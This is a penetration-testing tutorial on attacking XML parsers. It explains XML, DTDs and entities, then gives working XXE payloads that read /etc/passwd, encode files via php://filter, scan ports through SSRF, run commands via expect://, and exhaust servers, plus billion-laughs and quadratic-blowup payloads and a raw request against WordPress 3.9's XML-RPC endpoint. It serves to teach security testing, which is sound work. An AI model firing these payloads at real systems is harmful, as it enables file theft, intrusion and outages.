Web application penetration testing tutorials - XML attacks

Web Application Penetration Testing Tutorials 8 XML Attacks

In this web application penetration testing tutorial, we cover some techniques for attacking XML parsers.

XML parsers are programs or libraries that take XML documents as input and parse them so that the content can be retrieved in a meaningful and easy way.

For those who are unaware, Extensible Markup Language (XML) is used for data exchange.

At a glance, XML syntax looks similar to HTML, but it is used only to store data in an organized way. By default, an XML document is just a plain text document that does not do anything on its own.

To use XML, we need programs that read the file and do something meaningful with its contents, and this is where XML parsers come into the picture.

XML is a free, open standard maintained by the World Wide Web Consortium (W3C). Let's dive in and go through the various sections of this chapter.


Some sections of this tutorial cover denial-of-service (DoS) techniques. Please keep in mind that DoS techniques should be tested only in a controlled environment in which the application is easy to recover if it goes down.

Never try to test such techniques on production systems; doing so may land you in jail or cost you your job.

We will include the following topics in this Web application penetration testing tutorial:

  • XML 101 - The Basics
  • XXE attack - XML external entity
  • XML quadratic blowup

XML 101 - The Basics

Let's take a brief tour of XML before we step into the sections of interest.

XML was created because data stored in flat files (or general data files) is a big nuisance to handle when reading or writing. For every flat-file format, the developer has to write a tailor-made parser.

This is not the case with XML. A generic XML parser is used, and the developer only needs to write code that parses the document using that parser, not the parser itself. The XML format focuses on readability and ease of parsing.

The XML document looks like the following:

<?xml version="1.0" encoding="UTF-8"?>
<student>
 <name>James Jones</name>
 <roll>PACKT/1001/16</roll>
 <address>Birmingham, United Kingdom</address>
</student>

XML Elements

As you can see, the XML document contains different tags, with data values of different types inside the start and end tags. The document starts with a prolog, or XML declaration, which defines the data encoding used; in this case, we are using UTF-8 encoding.

Next, we have different tags with data enclosed inside them. A tag pair together with its content is called an element, and elements are named according to requirements or for clarity.

For example:

  • <name>James Jones</name> is a complete element.
  • <name> is the start tag.
  • James Jones is the text or data content.
  • </name> is the end tag.

Note: tags are case-sensitive, so the end tag must match the start tag exactly; otherwise it is a syntax error.

An XML document must contain exactly one root element. In the preceding example XML, <student>...</student> is the root element.
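
To see these rules in action, here is a minimal sketch that parses a student document like the one above with Python's standard xml.etree.ElementTree module. The names DOC, fields, and is_well_formed are illustrative only and do not come from the original tutorial.

```python
import xml.etree.ElementTree as ET

# A student document with a single root element.
DOC = """<student>
 <name>James Jones</name>
 <roll>PACKT/1001/16</roll>
 <address>Birmingham, United Kingdom</address>
</student>"""


def is_well_formed(text):
    """Return True if the parser accepts the text as well-formed XML."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


root = ET.fromstring(DOC)
# Map each child element's tag name to its text content.
fields = {child.tag: child.text for child in root}

print(root.tag)                                        # name of the root element
print(fields["name"])                                  # text inside <name>
print(is_well_formed("<name>James Jones</Name>"))      # end tag differs in case
print(is_well_formed("<name>a</name><roll>b</roll>"))  # two top-level elements
```

The last two calls show the parser rejecting a mismatched end tag and a document with more than one top-level element.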

XML Attributes

Let us consider an XML document:

<?xml version="1.0" encoding="UTF-8"?>
<blog id="123">
 <post>Hello World</post>
 <owner>James Jones</owner>
</blog>

In the preceding example, the <blog>...</blog> element has an associated attribute, id, with a value of 123. An attribute holds a single value associated with a particular tag.

One thing to note here is that an attribute value must always be quoted, with either single or double quotes.
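
As a small illustration, the following sketch reads the id attribute of the blog element using Python's standard xml.etree.ElementTree module and then shows that an unquoted attribute value is rejected. The variable names are hypothetical.

```python
import xml.etree.ElementTree as ET

BLOG = """<blog id="123">
 <post>Hello World</post>
 <owner>James Jones</owner>
</blog>"""

blog = ET.fromstring(BLOG)
blog_id = blog.get("id")  # attribute values are returned as strings
print(blog_id, blog.attrib)

# An attribute value without quotes makes the document malformed.
try:
    ET.fromstring("<blog id=123></blog>")
    unquoted_ok = True
except ET.ParseError:
    unquoted_ok = False
print(unquoted_ok)
```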

XML DTD and Entities

An XML DTD (Document Type Definition) is a document that is used to validate an XML document against certain criteria. Remember that an XML document may be syntactically correct and still not conform to its DTD.

So it basically acts as a template that defines the valid structure, attributes, and elements for a given XML document.

Internal DTD

Consider the following XML document:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
 <!ELEMENT student (name,roll,dob,address)>
 <!ELEMENT name (#PCDATA)>
 <!ELEMENT roll (#PCDATA)>
 <!ELEMENT dob (#PCDATA)>
 <!ELEMENT address (#PCDATA)>
]>
<student>
 <name>James Jones</name>
 <roll>PACKT/1001/16</roll>
 <dob>1990-01-01</dob> <!-- placeholder value; the source omits it -->
 <address>Birmingham, United Kingdom</address>
</student>

In the preceding document, a DTD is embedded in the document and defines how the document should be structured. The DTD is easy to read and can be interpreted as follows:

  • <!DOCTYPE student: the root element will be named student.
  • <!ELEMENT student (name,roll,dob,address)>: the student element will contain four elements: name, roll, dob, and address.
  • <!ELEMENT name (#PCDATA)>: the name element is of type PCDATA, which is parsed character data. The same applies to the other elements, such as roll, dob, and address.

After the DTD ends, the XML document follows.

The DTD we discussed here is called an internal DTD because it is embedded inside the XML document.

External DTD

Consider the following XML document:

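<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student SYSTEM "student.dtd">
<student>
 <name>James Jones</name>
 <roll>PACKT/1001/16</roll>
 <dob>1990-01-01</dob> <!-- placeholder value; the source omits it -->
 <address>Birmingham, United Kingdom</address>
</student>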

In this XML document, the DTD is referenced only by a URI; the parser will download the student.dtd file and validate the document against it. The student.dtd file includes declarations such as:

<!ELEMENT student (name,roll,dob,address)>
<!ELEMENT address (#PCDATA)>

So, in this case, we have split the DTD and the XML document into separate files; the DTD is therefore referred to as an external DTD.


An XML entity represents some information. A predefined entity usually represents a markup character such as < or >. In general, an entity reference starts with an ampersand (&), ends with a semicolon (;), and has the name of the entity in between.

For example, to represent <, we use &lt;. The following table lists the common predefined entities in XML:

Character    Entity reference
&            &amp;
<            &lt;
>            &gt;
"            &quot;
'            &apos;
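
The mapping in the table can be applied programmatically. The sketch below uses escape and unescape from Python's standard xml.sax.saxutils module; the helper names to_xml_text and from_xml_text and the sample string are made up for illustration.

```python
from xml.sax.saxutils import escape, unescape

# escape() handles &, < and > by default; the two quote characters
# are supplied as an extra mapping.
QUOTES = {'"': "&quot;", "'": "&apos;"}
UNQUOTES = {entity: char for char, entity in QUOTES.items()}


def to_xml_text(raw):
    """Replace the five special characters with their entity references."""
    return escape(raw, QUOTES)


def from_xml_text(escaped):
    """Turn the five predefined entity references back into characters."""
    return unescape(escaped, UNQUOTES)


raw = '<a href="x">Tom & Jerry\'s</a>'
escaped = to_xml_text(raw)
print(escaped)
print(from_xml_text(escaped) == raw)
```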

Let's take a look at an XML entity example:

<?xml version="1.0" encoding="UTF-8"?>
<student>
<less>&lt;</less>
</student>

Entity Declaration 

We can define our own entities, which refer to some information either internally or externally.

Consider the following XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
<!ELEMENT student (#PCDATA)>
<!ENTITY name "James Jones">
]>
<student>&name;</student>

In the DTD, <!ENTITY name "James Jones"> defines the entity &name; with the value James Jones.

An entity declaration of this type is called an internal declaration because everything is defined within the same document and nothing needs to be fetched externally.
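
As a quick check of how an internal entity is expanded, this minimal sketch feeds such a document to Python's standard xml.etree.ElementTree parser. The choice of Python is only for illustration; the tutorial's own target is a PHP parser.

```python
import xml.etree.ElementTree as ET

DOC = """<!DOCTYPE student [
<!ELEMENT student (#PCDATA)>
<!ENTITY name "James Jones">
]>
<student>&name;</student>"""

student = ET.fromstring(DOC)
# The parser has already replaced &name; with the declared value.
print(student.text)
```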

Similar to the external DTD, we also have external entities. Consider the following XML, which refers to an external entity:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
<!ELEMENT student (#PCDATA)>
<!ENTITY sname SYSTEM "https://www.prakharprasad.com/external.xml">
]>
<student>&sname;</student>

To declare an external entity, we use:

<!ENTITY name SYSTEM "URI">

As the parser reads the XML document, it processes the external URI.

The URI is resolved by its handler and the referenced resource is fetched; wherever the external entity reference is used, the parser substitutes the fetched content.

In the preceding XML, the URI is https://www.prakharprasad.com/external.xml and the entity name is sname; the external XML file will be downloaded and substituted in place of &sname; inside the <student>...</student> element. External entities are an important attack vector from an attacker's perspective.

We will use external entities in the next section, where we discuss the XML External Entity (XXE) attack.
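
Whether an external entity is actually fetched depends on the parser and its configuration. As a hedged illustration, the sketch below points an external entity at a throwaway local file and parses it with Python's standard xml.etree.ElementTree, which, according to the Python documentation, does not expand external entities. The marker text, temporary file, and function name are assumptions made for this example only.

```python
import os
import tempfile
from pathlib import Path
import xml.etree.ElementTree as ET

MARKER = "SECRET-MARKER"


def parse_with_external_entity(uri):
    """Parse a document whose entity points at uri; report what comes back."""
    doc = (
        "<!DOCTYPE student [\n"
        '<!ENTITY sname SYSTEM "%s">\n'
        "]>\n"
        "<student>&sname;</student>" % uri
    )
    try:
        return ET.fromstring(doc).text or ""
    except ET.ParseError as exc:
        return "ParseError: %s" % exc


# Write a throwaway local file and point the entity at it with a file:// URI.
with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as handle:
    handle.write(MARKER)
try:
    result = parse_with_external_entity(Path(handle.name).as_uri())
finally:
    os.unlink(handle.name)

print(result)
print(MARKER in result)  # True would mean the file content was pulled in
```

A parser that is vulnerable to XXE would return the marker text here instead.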

XXE Attack

The XXE attack is based on the concept of external entities in XML. We can abuse the URI part of an external entity to do dirty things such as reading files, exfiltrating data, performing server-side request forgery, or even executing arbitrary code.

Consider the following XML parsing code in PHP:

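<?php
// Read the raw XML document from the POST parameter "xml".
$xml = $_POST["xml"];
// The flag name is cut off in the source after "LIBXML_"; LIBXML_NOENT
// (substitute entities) is assumed here, since XXE depends on it.
$student = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
?>
<title>Name Game</title>

Your name is <?php echo $student->name; ?>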


The preceding code simply displays the name supplied inside the XML document through a POST request.

Let's walk through an example. When we submit an XML document containing a <name> element, the PHP code parses it and echoes the name back in the response.

In other words, the PHP parsing code just picks up the data inside the <name> tag of the XML document. Now let's start abusing the URI section of external entities for exploitation.

Reading Files

XXE allows us to read files on the system. This is really powerful because we can read the contents of various juicy configuration files containing sensitive information, such as a database username and password.

To demonstrate the ability to read files, we declare an external entity and then point its URI section to a file on the web server's disk.

Consider the following XML document, which will be fed to the parser as input:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
<!ENTITY oops SYSTEM "file:///etc/passwd">
]>
<student>
<name>&oops;</name>
</student>

The response from the parser contains the contents of the file. Look at that! We just read the contents of the /etc/passwd file from the Linux web server.

We achieved this by abusing the parsing script: we used the file:// handler to read the file and display its contents through an external entity. Similarly, we can read other files as well (if permissions allow).

In some environments, it is also possible to get a directory listing with the file:// handler:

<!ENTITY oops SYSTEM "file:///etc/">

This results in a directory listing for /etc.

PHP Base64 conversion URI as an alternative 

We can use PHP's Base64 conversion URI as an alternative to the file:// URI technique for reading files. The general format of the URI is:

php://filter/convert.base64-encode/resource=/file/to/read

Let's repeat the same process, but this time using the conversion technique instead. The XML payload is as follows:

<!DOCTYPE student [
<!ENTITY pwn SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<student>
<name>&pwn;</name>
</student>

Once the parser receives the payload, it returns the contents of the /etc/passwd file in Base64-encoded format.

We can then paste the encoded content into any Base64 decoder to decode the file back to its original form.
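
Decoding the returned text does not need an external tool. The following is a minimal sketch using Python's standard base64 module; the sample line is made up to stand in for a real response body, and decode_filter_output is a hypothetical helper name.

```python
import base64


def decode_filter_output(encoded):
    """Decode Base64 text returned via php://filter back into file contents."""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Made-up sample standing in for the Base64 text found in a response.
sample_line = "root:x:0:0:root:/root:/bin/bash\n"
encoded = base64.b64encode(sample_line.encode("utf-8")).decode("ascii")

print(encoded)
print(decode_filter_output(encoded))
```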

This technique is advised whenever a PHP environment is suspected to be affected by an XXE vulnerability.


SSRF is shorthand for server-side request forgery. It allows an attacker to trick the server running the XML parser into making a connection to a remote host. It will be covered in detail in the next tutorial.

For now, we will use the SSRF vulnerability to scan remote ports. We will use an HTTP URL in an external entity and then manually change the port number.

The logic is this: whenever the parser tries to load the entity from the URI, every successful attempt (open port) returns a page with an HTTP request failure, which sometimes displays the service banner.

Every unsuccessful attempt, on the other hand, displays an error indicating a connection failure.

The initial XML payload is this one:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
<!ENTITY oops SYSTEM "http://scanme.nmap.org:20/">
]>
<student>
<name>&oops;</name>
</student>

As you can see, we start with port number 20 in the URL and sequentially increase the port number until we find an open port:

<!ENTITY oops SYSTEM "http://scanme.nmap.org:20/">
<!ENTITY oops SYSTEM "http://scanme.nmap.org:21/">
<!ENTITY oops SYSTEM "http://scanme.nmap.org:22/">
... ... ... ... ... ...
<!ENTITY oops SYSTEM "http://scanme.nmap.org:X/">
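
Changing the port number by hand gets tedious, so the payloads can be generated instead. This is only a sketch that builds the XML strings; it sends nothing, and the function name port_probe_payloads is hypothetical. Submitting the payloads and reading the responses is left to whatever client you use in your own test environment.

```python
def port_probe_payloads(host, ports):
    """Yield (port, payload) pairs, one XXE payload per port to probe."""
    template = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE student [\n"
        '<!ENTITY oops SYSTEM "http://{host}:{port}/">\n'
        "]>\n"
        "<student>\n"
        "<name>&oops;</name>\n"
        "</student>"
    )
    for port in ports:
        yield port, template.format(host=host, port=port)


payloads = dict(port_probe_payloads("scanme.nmap.org", range(20, 23)))
print(payloads[22])
```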

For port number 20, we get an error saying that the network is unreachable and that the external entity failed to load.

We get an identical error for port number 21, but for port number 22 we get an HTTP request failure error, which is proof of an open port.

In fact, this time we also get a service banner: the server is running an OpenSSH service on port 22. Using this true/false logic, we can easily scan ports.

Remote Code Execution

The ability to execute arbitrary code on the server is always attractive. We can use PHP's expect:// URI wrapper to run arbitrary commands on the server. The PHP documentation says that we can execute a command by placing the command name inside the expect:// URI.

Consider the following XML payload, which triggers code execution when the expect:// wrapper is enabled (it requires the PECL expect extension and is not available by default):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
<!ENTITY rce SYSTEM "expect://id">
]>
<student>
<name>&rce;</name>
</student>

The preceding payload executes the Linux id command on the affected web server.

That's it for RCE. Let's now move on to denial of service through XXE.

Denial of Service through XXE 

We can use XXE to force a server to read files such as /dev/random or /dev/urandom and knock it offline. By now you are familiar with the file:// URI, so we will create an XML payload that reads /dev/random through the file:// URI and then take the server down by repeating the request several times:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
<!ENTITY oops SYSTEM "file:///dev/random">
]>
<student>
<name>&oops;</name>
</student>

When this XXE payload is submitted several times, the server slows down and eventually goes down, as I observed on my testbed.

A Cloudflare error is displayed because the host server is unavailable (due to the attack). Let's now go through the XML quadratic blowup technique.

XML Quadratic Blowup 

XML quadratic blowup (XQB) is a denial-of-service attack vector against an XML parser. Before I write about XQB, let me explain an earlier technique called billion laughs, which does not work anymore but will give you a foundation for XQB.

XML Billion Laughs

The XML billion laughs DoS attack starts by simply declaring an XML document with an entity named lol (hence the word laughs in the name, though in general this can be any valid name). The entity is then nested 10 times (or more).

This forces the XML parser to allocate memory for each entity reference.

So a large amount of memory gets wasted. By sending this XML document repeatedly, one can exhaust all of a server's memory, eventually killing it.

However, parsers now detect nested XML entities and stop parsing immediately, killing this vector.

A classic XML billion laughs payload is as follows:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
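
The name becomes clear once the expansion is worked out. Assuming ten references per level, as in the classic payload, each level multiplies the expanded size by ten, so the ninth level holds a billion copies of the three-byte string lol. The helper below is a hypothetical name used only for this arithmetic.

```python
def billion_laughs_size(base="lol", fanout=10, levels=9):
    """Bytes produced when the top-level entity is fully expanded."""
    return len(base) * fanout ** levels


for level in (1, 3, 6, 9):
    size = billion_laughs_size(levels=level)
    print("lol%d expands to %d bytes" % (level, size))
```

A document of well under a kilobyte therefore asks the parser to hold roughly 3 GB of text.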

Although this vector is dead, it is the foundation of our XQB attack.

The Quadratic Blowup

Instead of using nested entity references, the quadratic blowup technique declares a single large entity and then refers to that entity thousands of times inside an XML element. The result is very similar to that of billion laughs.

A typical XML quadratic blowup document looks like this:

<?xml version="1.0"?>
<!DOCTYPE student [
<!ENTITY x "xxxxxxxxxxxxxxxxxxx..."> <!-- 50,000-100,000 characters -->
]>
<student>&x;&x;&x;&x;&x;&x;&x;&x;...</student> <!-- 50,000-100,000 references -->

The preceding template declares an entity that is thousands of bytes long and then places thousands of references to it inside an XML element. The outcome is similar to that of billion laughs.
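
The word quadratic comes from the arithmetic: the request grows with the entity length plus the number of references, while the expanded text grows with their product. The sketch below is a rough estimate that ignores the few bytes of surrounding markup, and the function name is made up.

```python
def quadratic_blowup_sizes(entity_len, references, entity_name="x"):
    """Return (approximate bytes sent, bytes after expansion)."""
    reference = "&%s;" % entity_name
    sent = entity_len + references * len(reference)
    expanded = entity_len * references
    return sent, expanded


sent, expanded = quadratic_blowup_sizes(50_000, 50_000)
print(sent, expanded)
```

With the lower bound of the template (50,000 characters and 50,000 references), a request of about 200 KB expands to about 2.5 GB.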

WordPress 3.9 quadratic blowup vulnerability – Case Study

WordPress does not require any introduction; it is probably the most widely deployed blogging CMS on the Internet. However, WordPress versions 3.9 and below were affected by a quadratic blowup vulnerability, which was discovered by Israeli security researcher Nir Goldshlager.

WordPress exposes an XML-RPC endpoint that accepts valid XML data.

The XML parser then processes the XML data or document, and this is where XQB comes into the picture.

The attack takes advantage of the default Apache/MySQL memory configuration and the way WordPress interacts with it. The vulnerability can be exploited by simply sending XML-RPC documents containing the XQB entity arrangement. The HTTP request is as follows:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: sandbox.prakharprasad.com
Connection: keep-alive
Content-Length: 220079

<?xml version="1.0"?>
<!DOCTYPE DoS [
<!ENTITY x "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.... (truncated)">
]>
<DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;...... (truncated)</DoS>

The XML payload sent to the XML-RPC endpoint contains an entity made of thousands of x characters and about 40,000 references to it in the <DoS> XML element. When the same request is sent again and again, the server eventually gets choked and dies, with RAM and CPU usage reaching their maximum.

A similar DoS is also available for the Drupal CMS platform.


In this Web application penetration testing tutorial, we have gone through different ways in which we can exploit an XML Parser or a service that parses XML. 

XML parsers are very common these days; they can be found in API endpoints, XML services, or even file upload forms that process XML files after uploading.

Many of them are misconfigured, and thus flaws like XXE surface. Practice XXE and XML DoS techniques in a controlled environment for a better understanding. XXE has even been used to obtain remote code execution on Facebook: http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

In the next Web application penetration testing tutorial, we will cover some emerging attack vectors such as PHP object injection, RPO, and many more.


Hi, I'm Rahim Ansari from India. I love blogging, website design, and web development, and I like to learn and share technical hacking and security tips with you. I love my friends.
